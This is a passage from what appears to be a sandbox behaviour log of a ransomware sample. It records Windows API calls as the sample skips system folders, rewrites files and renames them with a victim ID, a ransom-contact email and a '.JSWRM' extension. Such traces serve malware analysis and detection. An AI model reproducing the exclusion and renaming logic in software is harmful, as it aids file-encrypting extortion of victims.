lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1130, lpOverlapped=0x0) returned 1 [0126.516] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.516] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1130, lpOverlapped=0x0) returned 1 [0126.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.516] CloseHandle (hObject=0x338) returned 1 [0126.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0126.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0126.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0126.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0126.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0126.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0126.517] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\eu\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\eu\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\eu\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\eu\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0126.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0126.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0126.518] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf158c060, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf158c060, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf16bd2da, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0126.518] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.518] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.518] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.518] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.518] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.518] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.518] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.518] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.518] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.518] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0126.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0126.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0126.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0126.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d298, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0126.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dff8 [0126.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0126.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0126.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.518] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0194432, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0194432, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0194432, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x39070, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d920, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0126.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0126.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0126.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0126.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.519] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa2cf9c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa2cf9c3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa2f5c0f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13a90, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.519] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.520] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.520] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.520] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d920, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0126.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0126.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.520] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42fef17, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42fef17, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf43e3cb7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1fda98, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.520] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.520] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.520] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.520] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.520] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.520] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.520] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.520] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.520] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.520] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0126.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dba8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0126.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0126.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d920, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0126.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244708 [0126.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0126.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.521] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa2834f0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa2834f0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa2f5c0f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0126.521] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.521] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.521] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.521] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.521] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.521] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.521] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.521] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.521] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.521] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0126.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0126.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0126.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22ce70, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0126.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e688 [0126.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244708 | out: hHeap=0x1e0000) returned 1 [0126.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.521] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x68ff786, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x68ff786, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x68ff786, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MI93CC~1.DLL")) returned 1 [0126.521] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.522] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.522] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.522] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.522] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.522] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.522] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.522] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.522] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.522] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, 